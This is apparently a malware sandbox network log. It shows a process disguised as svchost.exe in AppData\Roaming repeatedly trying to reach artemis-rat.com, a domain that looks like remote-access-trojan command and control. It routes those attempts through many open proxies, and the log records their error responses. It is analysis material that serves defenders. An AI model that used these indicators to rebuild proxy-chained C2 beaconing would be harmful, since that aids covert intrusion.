Mar 9, 2024 13:14:31.462090015 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2683	192.168.2.5	58712	183.230.162.122	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.308271885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.691446066 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2684	192.168.2.5	58790	46.51.249.135	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.308566093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.604091883 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:31 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2685	192.168.2.5	57774	62.85.224.217	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.308829069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2686	192.168.2.5	58829	129.213.150.205	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.308830023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2687	192.168.2.5	57810	34.87.84.105	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.308980942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.145809889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.146408081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.146311998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2688	192.168.2.5	58753	65.21.255.197	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.311021090 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:31.639352083 CET	75	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Length: 0
Mar 9, 2024 13:14:32.016047955 CET	103	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2689	192.168.2.5	58779	107.175.37.178	43029	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.312864065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2690	192.168.2.5	58707	116.199.168.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.316265106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2691	192.168.2.5	58615	41.173.24.38	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.330658913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.333539009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.833749056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.833714008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2692	192.168.2.5	58844	95.164.207.157	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.335773945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.561084032 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.20 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3661 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ezproxies.com X-Cache-Lookup: NONE from ezproxies.com:58378 Via: 1.1 ezproxies.com (squid/3.5.20) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2693	192.168.2.5	55878	163.47.210.74	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.344435930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.349332094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.442919016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2694	192.168.2.5	58774	8.219.228.100	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.347548008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2695	192.168.2.5	58851	192.111.137.35	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.358346939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2696	192.168.2.5	58752	202.162.219.10	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.367072105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2697	192.168.2.5	55874	51.75.126.150	35632	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.369689941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.485898018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2698	192.168.2.5	55920	179.49.237.54	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.372328043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.380486965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.474406958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2699	192.168.2.5	57950	201.174.239.28	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.375081062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2700	192.168.2.5	58565	123.56.1.50	3129	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.376192093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.703699112 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2701	192.168.2.5	55934	66.228.37.252	46695	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.394706964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.177423000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2702	192.168.2.5	58827	202.83.102.83	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.395478010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2703	192.168.2.5	58838	198.105.101.129	5758	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.397418976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.686866045 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2704	192.168.2.5	55875	31.148.207.153	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.401757956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.756566048 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2705	192.168.2.5	57930	43.255.113.232	84	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
